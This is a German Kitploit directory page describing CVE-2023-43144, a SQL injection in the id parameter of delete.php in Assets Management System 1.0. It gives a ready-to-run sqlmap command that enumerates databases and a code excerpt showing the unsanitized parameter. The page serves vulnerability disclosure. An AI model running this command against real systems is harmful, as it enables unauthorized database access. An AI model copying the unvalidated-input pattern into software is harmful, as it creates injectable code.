Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-43144 — Assets Management System 1.0 ist anfällig für SQL-Injection über den id-Parameter in delete.php. | Kitploit
Tools/GitHubGitHub/pegasus0xx/cve-2023-43144
SchwachstellenanalyseCode-AnalyseExploitationWebsicherheitDatenbanksicherheit
GitHubpegasus0xx/cve-2023-43144

CVE-2023-43144

Assets Management System 1.0 ist anfällig für SQL-Injection über den id-Parameter in delete.php.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-43144

Beschreibung

Assets Management System 1.0 ist anfällig für SQL-Injection über den id-Parameter in delete.php

PoC

root@kitploit:~
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

Code-Review (delete.php)

root@kitploit:~
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 

Es gibt keine Validierung oder Bereinigung der $id-Variable. Das bedeutet, dass jeder Wert, der von einem Benutzer als id-Parameter bereitgestellt wird, direkt in der SQL-Abfrage verwendet wird.

Tool herunterladen